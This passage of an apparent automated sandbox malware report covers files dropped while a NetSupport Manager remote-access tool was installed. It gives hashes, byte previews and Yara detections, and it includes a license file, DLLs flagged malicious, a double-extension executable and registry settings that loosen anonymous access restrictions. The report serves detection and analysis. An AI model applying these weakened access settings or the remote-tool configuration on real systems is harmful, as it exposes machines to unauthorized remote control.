                                                                                                                    Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.S.y.s.t.e.m. .A.c.c.e.s.s.].....L.S.A.A.n.o.n.y.m.o.u.s.N.a.m.e.L.o.o.k.u.p. .=. .1.....[.R.e.g.i.s.t.r.y. .V.a.l.u.e.s.].....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.C.o.n.t.r.o.l.\.L.s.a.\.E.v.e.r.y.o.n.e.I.n.c.l.u.d.e.s.A.n.o.n.y.m.o.u.s.=.4.,.1.....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.C.o.n.t.r.o.l.\.L.s.a.\.R.e.s.t.r.i.c.t.A.n.o.n.y.m.o.u.s.=.4.,.0.....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.C.o.n.t.r.o.l.\.L.s.a.\.R.e.s.t.r.i.c.t.A.n.o.n.y.m.o.u.s.S.A.M.=.4.,.0.....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.L.a.n.M.a.n.S.e.r.v.e.r.\.P.a.r.a.m.e.t.e.r.s.\.R.e.s.t.r.i.c.t.N.u.l.l.S.e.s.s.A.c.c.e.s.s.=.4.,.0.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....

                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\NSM.LIC

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\product.dat

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):506
                                                                                                                    Entropy (8bit):4.906453708261214
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                                                    MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                                                    SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                                                    SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                                                    SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                                                    Malicious:false
                                                                                                                    Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..

                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\readnsm.chm

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:MS Windows HtmlHelp Data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):157303
                                                                                                                    Entropy (8bit):7.89872596637976
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:duYWawdwZ7n0IjSTIvtFgSHcvCq1vdJojjXwDWaSRKjG88gs9A6BmgOUy:dI6Z7NvXcDJPo2WaMuXts9mUy
                                                                                                                    MD5:A9B2B2B4D72B44C182FF8403C97078BD
                                                                                                                    SHA1:808BE17D64883BF0B550B4B2E621D206736421D0
                                                                                                                    SHA-256:B86947F654351E605ACF0E3D09A00B4A20648CA60168476D1FBE6C4D9EEFE300
                                                                                                                    SHA-512:9459F723ACE5CFBEA23FC66738954A2383C730517486E3DE1F5CE70F48CDF039204683CA19E60FEA76616500CC7C82242051ABC04CC0F8D66BCDC46069AB9CBC
                                                                                                                    Malicious:false
                                                                                                                    Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................wf..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...M.../#ITBITS..../#IVB...-../#STRINGS...q.l./#SYSTEM....G./#TOPICS...M.`./#URLSTR...5.<./#URLTBL...-.../#WINDOWS...a.L./$FIftiMain...|..Q./$OBJINST...=.?./$WWAssociativeLinks/..../$WWAssociativeLinks/BTree...C.L./$WWAssociativeLinks/Data......./$WWAssociativeLinks/Map....../$WWAssociativeLinks/Property.... ./$WWKeywordLinks/..../$WWKeywordLinks/BTree...I.L./$WWKeywordLinks/Data......./$WWKeywordLinks/Map....../$WWKeywordLinks/Property...# !/conventions_and_terminology.html....../default.css.....O$/existing_installation_detected.html.....b./helpman_settings.js...~.[./helpman_topicinit.js......@./hm_btn_navigate_next.png...Y.../hm_btn_navigate_next_d.png...X.m /hm_btn_navigate_next_orange.png...E.m./hm_btn_navigate_prev.png...2.../hm_btn_navigate_prev_

                                                                                                                    C:\Users\user\AppData\Local\Temp\~29B1.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):642
                                                                                                                    Entropy (8bit):3.6462235351457646
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q+4aVzvlXZMe5C6izCKaOPQ40bdpYm2o2nLCSm2TlCEtIlLlDtIloszlu:Q+LvjFihPQldjLG2Smi4EsDFyQ
                                                                                                                    MD5:9ADACE2EE6491BB7727E33B26D08EE21
                                                                                                                    SHA1:74F56456E8190F259D689D4FE9EC396989534010
                                                                                                                    SHA-256:440EA24D4A48DE2737817492926A97457151DC3BEB71BA66207AC33CBBC8F7D3
                                                                                                                    SHA-512:CD5FA2E207ED2A29A1E18F05374276D5528B5270B68E94F45F9819605192A4081B2394CAA6EF07B1B5D407EA0BBE153E825213F13C1CBB75681158A3827F48AD
                                                                                                                    Malicious:false
                                                                                                                    Preview:..[.G.e.n.e.r.a.l.I.n.f.o.].....P.a.t.h.T.o.I.S.B.E.W.6.4.E.x.e.=.........[.K.e.y.L.i.s.t.].....F.i.l.e.K.e.y.1.=.i.c.o.v.i.e.w.e.r...d.l.l.....C.o.u.n.t.=.1.........[.i.c.o.v.i.e.w.e.r...d.l.l.].....F.i.l.e.K.e.y.=.i.c.o.v.i.e.w.e.r...d.l.l.....F.u.l.l.P.a.t.h.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.\.I.c.o.V.i.e.w.e.r...d.l.l.....C.o.m.p.o.n.e.n.t.=.I.c.o.V.i.e.w.e.r...d.l.l.....R.e.g.C.m.d.L.i.n.e.=.....U.n.R.e.g.C.m.d.L.i.n.e.=.....A.c.t.i.o.n.S.t.a.t.e.=.2.....6.4.B.i.t.=.N.o.....C.o.s.t.=.1.....O.r.d.e.r.=.3.2.6.0.0.....F.a.i.l.e.d.=.N.o.....H.R.E.S.U.L.T.=.0.....

                                                                                                                    C:\Users\user\Desktop\Pyyidau.vbs.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):433152
                                                                                                                    Entropy (8bit):5.502549953174867
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                    MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                                                    SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                                                    SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\3b1425.msi

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\3b1425.msi, Author: Joe Security
                                                                                                                    Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                                                    C:\Windows\Installer\3b1428.msi

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\3b1428.msi, Author: Joe Security
                                                                                                                    Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                                                    C:\Windows\Installer\MSI1AFB.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):173816
                                                                                                                    Entropy (8bit):6.23179846686102
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:CfxQXjgrNmFy/E9XFPaKON5hqTYYPOaLId+MSBFskIvE51+VMA1:CfuzgrNW5iKQ5hdIVqdzGry
                                                                                                                    MD5:0E6FDA2B8425C9513C774CF29A1BC72D
                                                                                                                    SHA1:A79FFA24CB5956398DED44DA24793A2067B85DD0
                                                                                                                    SHA-256:E946B2FAE0B36C43064463A8C16A2774ADAC30C4188C5AF90E9338B903C501C9
                                                                                                                    SHA-512:285BB7759A1214ABED36162AC8BE2D48DF17A05278C4DE97562448E20FD43B635563A6819F37E23D92A5F5ED0205A68BFFE43DAC0D3A67513BD0303B4E7F89AA
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h`....S...S...S...S...SA..S...S...S...S...S...S.~.S...S...S...S.~.S...SA..S...SA..S...SA..S...S...S...SA..S...SRich...S........PE..L.....Y...........!.................................................................C....@..........................A..a...d4......................................................................(...@............................................text............................... ..`.rdata..............................@..@.data...41...P.......*..............@....rsrc................<..............@..@.reloc...G.......H...B..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1B79.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1BA9.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1BA9.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1BC9.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1BC9.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1C08.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1C08.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1C29.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):156928
                                                                                                                    Entropy (8bit):6.027765050560978
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:7tq45H7fN+qN7TyL3zyRVPkF5ka2ACEJ2dZYUdmaw+6JcKsWjcdl3K0ud9nB9U9S:hq41fALwolSsCZhdVw+6C1K0udFPI1g
                                                                                                                    MD5:A1B7850763AF9593B66EE459A081BDDF
                                                                                                                    SHA1:6E45955FAE2B2494902A1B55A3873E542F0F5CE4
                                                                                                                    SHA-256:41B8E92DEBA5206C78817236ED7F44DF95636CA748D95FAB05F032F5AEC186AF
                                                                                                                    SHA-512:A87A302A9A0D19D7CE293B42F5E7BC09664B21307A5321F226157FCC57EB2DF2B59C6651878CB23969A182C82B55E8671FF00F8462194B81A907974A49CB25B1
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{..7?..d?..d?..d..#d...d.. d9..d.. d>..d..!d...d.. dL..d6.md<..d6.}d ..d?..d-..d..!d)..d..$d>..d..'d>..d?.yd>..d.."d>..dRich?..d........................PE..L...1..Y...........!.....J..........F........`......................................UH..............................p...E............@...............H.......P..@...................................H...@............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data...t1..........................@....rsrc........@......................@..@.reloc..tJ...P...L..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1DD0.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1DF0.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI1E3F.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
